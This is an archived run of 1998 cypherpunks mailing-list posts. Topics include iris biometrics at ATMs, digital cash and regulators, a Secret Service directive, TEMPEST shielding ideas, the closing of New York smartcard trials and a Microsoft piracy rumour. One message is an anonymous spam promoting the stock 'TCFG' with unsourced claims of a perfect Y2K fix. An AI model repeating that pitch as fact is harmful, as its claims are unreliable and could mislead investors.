44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Thu, 5 Nov 1998 00:25:00 +0800
To: "cypherpunks@toad.com>
Subject: Sensar knows!
Message-ID: <000301be0808$21a6e960$8d2580d0@ibm>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3998.1071713814.multipart/mixed"

--Boundary..3998.1071713814.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

<the last line of this is a funny double entendre>
HERE'S LOOKING AT YOU, SENSAR
By Peter D. Henig <mailto:peteh@redherring.com>
Red Herring Online
November 3, 1998
You walk out the door and down the street to find the closest ATM machine,
but reaching into your wallet -- "oops" -- you forgot your cash card.
Don't you hate that?
Well, if Sensar, a biometrics manufacturer of iris identification products
has anything to say about it, you'll soon be tossing that ATM card in the
can.
Sensar has announced the world's largest ever combined equity investment in
the field of personal electronic identification -- which is actually a
bigger deal than you might think.
Moving a step closer, as the company puts it, "toward making PINs and
passwords obsolete," Citibank, NCR, J.P. Morgan, Lehman Brothers, Merrill
Lynch's wholly-owned subsidiary, KECALP Inc., and others have invested an
aggregate of $28 million in Sensar as the company attempts to further roll
out its iris identification pilot programs around the world in the hopes of
owning this futuristic segment of the biometrics market targeted at the
financial services and banking industries.
Who cares?
Who cares about equity stakes in biometrics companies?
Good question, and the same one we asked when the company came a-pitching us
their story.
It turns out, however, that biometrics is -- as Sensar likes to remind us --
an emerging technology that could soon turn into a hot, if not huge, market
around the globe.
With the initial results of their European pilot program (set up in a small
city outside London), it's "going very, very well, and I do mean very well."
According to Per-Olof Loof, Senior Vice President of NCR's Financial
Solutions Group, Sensar is pumped to push forward with its iris recognition
products, shooting for commercial roll out in 1999, and a real ramp up of
shipping product by 2000 and 2001.
The Sensar Secure Iris Identification System is currently being used in NCR
ATMs and at teller stations at Nationwide Building Society, the United
Kingdom's largest savings and loan. Sensar's Iris Identification product was
also used by professional athletes for access control and security at the
1998 Winter Olympics in Nagano, Japan. Citibank, an equity investor, has
also launched an in-house pilot program using its employees to test iris
scan technology.
And just how big is this market?
While company officials wouldn't be pinned down on specific forecasts, Mr.
Olof noted that there are 20 billion customer transactions annually on NCR
ATM machines alone, and that NCR has 37 percent market share. That's not a
bad partner for a private company like Sensar to have.
Moreover, Tom Drury, president and CEO of Sensar noted that there are
currently 900,000 ATMs worldwide and 160,000 new machines shipping each
year.
Smile!
The unique aspect of Sensar's products is that you may not even be aware
you're being watched.
Sensar's iris identification products use standard video cameras and
real-time image processing to acquire a picture of a person's iris (the
colored portion of the eye), digitally encode it, and compare it with one on
file -- all in the space of a few seconds. It allows for highly accurate
identification (comparing features across a whole database) and verification
(comparing features with a single template) in a user friendly environment;
second in accuracy only to retina identification using sans-laser beams.
In layman's terms, this might mean opening up an account at your local bank
by simply sitting down, having them take a snapshot of your eyeballs, and
then hitting the ATMs or tellers for some cash.
According to the company, iris recognition uses digitally encoded images of
the iris to provide a highly accurate, easy-to-use and virtually fraud-proof
means to verify a customer's identity. With 266 identification
characteristics, the iris is the human body's most unique physical
structure. And unlike other measurable human features in the face, hand,
voice or fingerprint, the patterns in the iris do not change over time;
receeding hairlines be damned.
They're not alone
"This landmark agreement puts iris identification light years ahead of any
other personal electronic identification technology," said Mr. Drury.
"Clearly, this agreement validates Sensar's product as the most accurate,
customer-friendly, cost effective personal electronic identification product
ever developed."
That's not bad cheerleading, but Sensar is clearly not the only biometric
firm in the identification market's field of vision.
According to the Gartner Group (IT
<http://www2.nordby.com/herring/returnquote.asp?SYMBOL=IT>), Miros and
Visionics were the first companies to enter the facial recognition market,
although facial recognition tends to be a less accurate means of
identification. These two companies offer far cheaper products than Sensar,
and are targeting applications to such markets as PC and network access and
online transactions. Sensar, however, will also be designing for and
marketing to the online environment, as it envisions iris technology hitting
the desktop environment.
While the Gartner Group forecasts that the more widely accepted fingerprint
recognition techniques will be the remote access standard of choice through
2001, it also predicts that "aggressive financial organizations will begin
full-scale rollouts of iris recognition for tellers and ATMs by 2000."
Hence, the $28 million equity stake in Sensar by this highbrow club of
financial institutions.
By 2002, Gartner analysts predict iris recognition will be the biometric of
choice, an area where IrisScan Inc. holds an exclusive patent. (Sensar uses
the iris recognition process developed and licensed from IriScan, Inc., and
has the exclusive use of that technology for all financial services
transactions.)
And as far as exit strategy goes, everybody, including Sensar, still has
dreams of Silicon Valley dollars dancing in their heads.
"We have a classic Silicon Valley entrepreneurial team," said Mr. Drury, who
is located in New Jersey, "and we consider an IPO as a definite exit
strategy."
We'll be watching.



--Boundary..3998.1071713814.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "winmail.dat"

eJ8+IgIPAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcA
GAAAAElQTS5NaWNyb3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEG
gAMADgAAAM4HCwAEAAgAHwAAAAMADgEBA5AGAIwTAAAnAAAACwACAAEAAAAL
ACMAAAAAAAMAJgAAAAAACwApAAAAAAADADYAAAAAAB4AcAABAAAADgAAAFNl
bnNhciBrbm93cyEAAAACAXEAAQAAABYAAAABvggIIImtKy7kc7wR0pgDREVT
VAAAAAACAR0MAQAAABcAAABTTVRQOlhBU1BFUjhEQExPQk8uTkVUAAALAAEO
AAAAAEAABg4AktgfCAi+AQIBCg4BAAAAGAAAAAAAAADrBcS5Tqy9EYX1jmL6
Rl5rwoAAAAsAHw4BAAAAAwAGEJiY3roDAAcQ3hMAAB4ACBABAAAAZQAAADxU
SEVMQVNUTElORU9GVEhJU0lTQUZVTk5ZRE9VQkxFRU5URU5EUkVIRVJFU0xP
T0tJTkdBVFlPVSxTRU5TQVJCWVBFVEVSREhFTklHPE1BSUxUTzpQRVRFSEBS
RURIRVJSSU4AAAAAAgEJEAEAAAA1DwAAMQ8AAPwZAABMWkZ1OZYCOAMACgBy
Y3BnMTI1FjIA+Atgbg4QMDMzTQH3IAKnAgBjaArAc/BldDAgBxMCgwBQA1Q/
ELkHbQKDDlAD1BC/fX2zCoAIyCA7CW8OMDUCgJkKgXVjAFALA3NiD0CJAUBz
YRlCdWxuAiAGZQwhC7MzNiA8dKhoZSALYHMFQGwLgLEbIG9mIBsABAAgHDEA
YSBmdW5ueSBeZAhgAmAbIAnwdAnwZA0JcD4KogqASEVSRQInBfBMT09LSU4C
RxFQVCBZT1UsQQYARU5TQVIDMGI3AtESAQvwNB4UC6YgQs8c8AjQAEEZ4CBQ
ESAEkCAgRC4gSAnwaWeHGuAAwAMQdG86cCKxbGhACXEbEHIFEA8gLt0FoG0e
ACIwGcYgAzAbk45SCYAjISTDIE9uG5NhJjROb3ZlBtAi0TNhH8AxOTk4AzEg
qlmpCGAgdwdAaxvQdQVAvxsCHRAFsQBwJrAdEHcDoO8bAhtgCdEqwW8coAuA
JrA9GwJjCQAREBthH2BNIO8AwRwgGiAfwGIqsQlwLkP3I3ALgCyxeQhhKkId
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
--Boundary..3998.1071713814.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 5 Nov 1998 01:48:38 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: ?Lions?
In-Reply-To: <v04020a15b264af18b1aa@[139.167.130.246]>
Message-ID: <36408C43.106C@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Oh. That's easy. Check out the essay section of <http://www.philodox.com/>

"Notice a few things about the mechanics of the model. First, everyone
who puts money onto the net, or takes it off, is identified to the
complete satisfaction of government
     regulators everywhere. Digital bearer cash is treated just like
physical cash in the eyes of regulators, and is subject to the same
regulations. There is no functional
     difference between a digital cash underwriter and an ATM machine."


> Render unto FinCEN. No problem. Flatland can't reach the sky no matter how
> hard they try. (hey. I'm rapping... pbbbt. tht. pbbbt. pbbbt. tht... :-))
> 

It is the financial foundation for a cyber world where regulators will
probably have a great deal of trouble operating. They may have no choice
but to settle for taking their cut at the borders.

I still see many of the same old problems when attempting to trade hard
goods, at least in large quantities. The problem of having to explain
how you came by a 6000 sqare foot home on 100 acres of mountainside in
Lake Pacid is not solved. It's not a total solution but it looks good.

It could be a great way to save for retirement - nobody can tell how
much E$ you have accumulated, where it came from or where you keep it.
Just draw it out as you need it, pay your taxes at the gate and use the
5th when necessary.

Regards,
Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: atlantis@earthlink.net
Date: Thu, 5 Nov 1998 02:46:10 +0800
To: <cypherpunks@Algebra.COM>
Subject: No Subject
Message-ID: <199811041811.NAA13498@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain



11/04/98


Y2K  Solution!
8  Pine  Circle  Dr., Silicon  Valley, Calif. USA


OTC  Company  "TCFG"  21 st. Century  Frontier  Group  has
through  several  members  of  their  administrative  research
department  leaked  vital  information  about  their  companies  
efforts.

Everyone  was  tight  lipped  and  interviews  were  refused,
and  through  un-named  sources  we  have  learned  that  the  
technology  and  software  solution  are  in  the  process  of  
being  patented!

In over  1640  trials, using  various  data  systems  the  use  
of  the  new  technology  and  software  solved  the  Y2K
problem  100%  of  the  time. 

This  small  publicly  traded  company  "TCFG"  which  is  just
3  years  old  is  through  various  sources  now  negotiating
with  the  "Big  Boys"!

"TCFG"  the  letters  to  look  for!

























 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 4 Nov 1998 23:12:58 +0800
To: cypherpunks@cyberpass.net
Subject: Praetoriani Novi
Message-ID: <v04020a02b26616522701@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Wed, 04 Nov 1998 06:17:44 -0600
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: New Powers for Secret Service
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Salt Lake City Tribune
http://www.sltrib.com/11031998/utah/utah.htm

IT'S CLASSIFIED: The Secret Service Will
Have a Hand In 2002 Security

BY GREG BURTON
THE SALT LAKE TRIBUNE

A classified executive order signed by President Clinton during the summer
has altered the way the Secret Service prepares for security at national
events,
a change already affecting the blueprint for the 2002 Winter Olympics.

Presidential protection, often a hectic, hodgepodge operation, has been the
jurisdiction of the Secret Service since John Wilkes Booth shot President
Lincoln. Now, the presidential directive orders the Secret Service to take an
active role in planning security for major national events, whether or not
presidents, vice presidents, ex-presidents, their spouses or other dignitaries
attend.

Called Presidential Decision Directive 62 (PDD 62), the order also
reportedly alters a range of national security considerations, although the
directive's internal hardware is top secret. PDDs, like executive orders,
do not
require the approval of Congress but come through the National Security
Council.

For Salt Lake City, PDD 62 means Secret Service agents already are
planning for the orchestration of executive ogling at the Winter Olympics
without knowing who the president of the United States will be or if that
person will attend.

At the 1996 Summer Games, when the same shadowy squad led
then-first-term Clinton through the magnolia trees in Atlanta, security
experts
with the Secret Service did not begin preparing for the executive visit
until after
Olympic organizers and the FBI had completed their security plan.

``The public has this perception of the Secret Service as a strange
institution
that rides in and rides out with black glasses on,'' says Dennis Crandall,
resident agent in charge of the Secret Service for Utah and Idaho. ``This is
kind of a new era for us.''

PDD 62 now enters a vault of classified security directives.

Among other PDDs is No. 29, issued in 1994, that established the Security
Policy Board, a secretive agency with authority over information systems'
security and safeguarding classified information. The National Security
Council
has refused to release details of PDD 29.

PDD 62 likely will remain equally veiled.

``PDD 62 is not classified, but the contents are,'' says David M. Tubbs, the
recently appointed special agent in charge for the FBI's Utah, Idaho and
Montana command.

Says Crandall: ``Portions of it are still sensitive.''

According to several national security experts, the major event clause in
PDD 62 is an outgrowth of a perceived lack of security planning for the
president's visit to the Atlanta Games.

Because of PDD 62, the Secret Service has been involved nearly from the
onset of security planning for the 2002 Winter Games.

``We are designated to take a more aggressive upfront role in major
events,'' says Crandall. Currently, the FBI and the Secret Service are
hammering out a memorandum of understanding that clarifies the division of
labor between the two federal security teams in accordance with PDD 62.

The Secret Service's role -- although a topic that has reportedly led to turf
wars in Washington, D.C. -- has been welcomed by most Salt Lake City
organizers. Tubbs does not see their involvement as a threat to the FBI, the
lead federal security agency for the 2002 Olympics.

``I have not had a turf war with anyone. Period,'' says Tubbs, who was one
of several agents with direct security oversight during Atlanta. ``We are all
involved in the planning stages here, so what has happened in the past is
unimportant. What is important is what happens in 2002.''
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 4 Nov 1998 18:35:30 +0800
To: cypherpunks@toad.com
Subject: problems with the concept
Message-ID: <199811040950.KAA15927@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> http://www.jya.com/hr4655-wjc.htm
> TEXT: CLINTON ON SIGNING THE "IRAQ LIBERATION ACT OF 1998" OCT. 31 

Mr. Clinton would seem to have a problem with the concept
of "covert" as it applies to personal and international actions.

The MIB who visited the radio astronomer who thought he discovered
extraterrestrial "intelligence", when it was just a classified intelligence
satellite, have a "subtlety" problem.

[see http://www.geocities.com/CapeCanaveral/Hall/7193/cancelled.html
(also stored on www.jya.com/crypto.htm)]


--Haste Orwellians Deride my Thugs













  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 5 Nov 1998 01:52:57 +0800
To: cypherpunks@Algebra.COM
Subject: Re: TEMPEST laptops
In-Reply-To: <19981101152627.C29091@die.com>
Message-ID: <v04011704b26628ee1ee8@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:02 PM -0500 11/1/98, Tim May wrote:
>
>All good points, but there's a big difference between trying to meet FCC
>emissions requirements for a commercial product that has to meet cost,
>weight, and cosmetic requirements (e.g., a plastic case!), and the scenario
>of making a TEMPEST-like box for a laptop. Ferrite beads and copper tape
>are a lot different from a sealed box made of 10-gauge copper sheet.

	Question:

	What if, instead of trying to entirely prevent leakage, one did a
combination of "redirecting" and "masking" emissions.

	Keep in mind I am asking from a point of total ignorance.

	To break the question down further, a tempest attack is limited by
2 things, distance from the machine (IIRC, the "level" or "strength" of RF
emissions drops by the square of the distance correct?) and (possibly) the
presence of other sources of RF in about the same bands.

	Assuming that the signal level drops by the square of the distance,
then one is far more likely to get tempested from a van outside than an
airplane overhead correct?  In that case, simply design one of Mr. May's
brazed copper boxes so that it is open something similar to:

                 ______________
		|_____         |
                     /         |
                               |
          _                    |
         | |________/          |
         |_____________________|

Where the laptop (or even a full sized tube monitor & computer) is placed
inside.


The other question is how hard, given a _specific_ machine would it be to
create a "RF" jammer? Sort of an active defense versus the passive defense
of a Tempest sheild. build a device that measures the RF coming off a
machine, and rebroadcasts the opposite (i.e. the negation) of the signal?
This should, or could "flatten" the signal making it useless.

Then again, I could be totally wrong.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Nov 1998 01:07:34 +0800
To: cypherpunks@toad.com
Subject: NYC Smartcards Die
Message-ID: <199811041618.LAA31005@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Chase, Visa and Mastercard have closed down their
smartcard trial on the Upper West Side of Manhattan, 
the NYT reports today.

It also says Mondex has closed its Swindon trial.

The problem in NY is that the system was too cumbersome
to use, needing special readers that were not always up to
snuff, compared to the familiar and reliable system for credit 
cards. Bribing users with start up cash didn't work either.
No one ever reloaded their cards. Not all merchants took them,
especially those handling only cash transactions.

Also, the cards could not be used outside the trial area, and
the paper says, "everybody leaves the Upper West Side,"
without saying where they go to kill time for the day like
out of work Koreans who dare not admit the sublimity
of being jobless at long last -- money cannot buy the joy.

Spokespersons say that they misjudged the customer's desire
for cash-like freedom and anonymity (my words). That the best 
prospect for smartcard future lies in captive users such as college 
campuses and the military where they expect an all-purpose card 
will catch on by providing handy ID and money, as well as (unsaid) 
perfect monitoring and data-gathering.

I'll keep my $12-balance card (never found a place to accept it) on 
the chance that it will be a valuable collector's item for the Edsel 
Electronic Opium Museum.

And we never leave the Upper West Side, well, once, to go to
the Harvard Club for a swell DCSNY. Great group, grim dump.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: entropi <entropi@mail.roava.net>
Date: Thu, 5 Nov 1998 01:22:59 +0800
To: cypherpunks@toad.com
Subject: Re: is it real?
In-Reply-To: <36413D1D.3C6@pacific.net.sg>
Message-ID: <19981104113503.B4836@mail.roava.net>
MIME-Version: 1.0
Content-Type: text/plain



While some of the "information" cited in this post is technically possible, as a
sys admin at a small start-up ISP, I can guarantee you that at least one ISP in the US is not kissing MS's ass in such a fashion.

One would need to present a warrant in order to obtain our customer information.
I sure as hell don't have the time or desire to help Gates track down people whohave managed to find their way around paying for his bloated OS.

It seems to me that the ISP would have to be in cahoots with Gates in order to make piracy charges stick.  Hence, one more arguement for using small, privacy oriented ISPs.  The lesson here is, never trust the telco ;)

On Wed, Nov 04, 1998 at 09:52:29PM -0800, zR wrote:
> >>for your info, please.
> >>
> >>>>Just in case.......
> >>>>......... basically.... don't install Windows 98 ..... since they 
> >have
> >>>>this "added" function.....  =)
> >>>>
> >>>> Microsoft slapped two more lawsuit against one teenager and one
> >>>>retired worker for using pirated Windows 98 software.
> >>>>
> >>>>For your information on how Microsoft actually trace PIRATED /
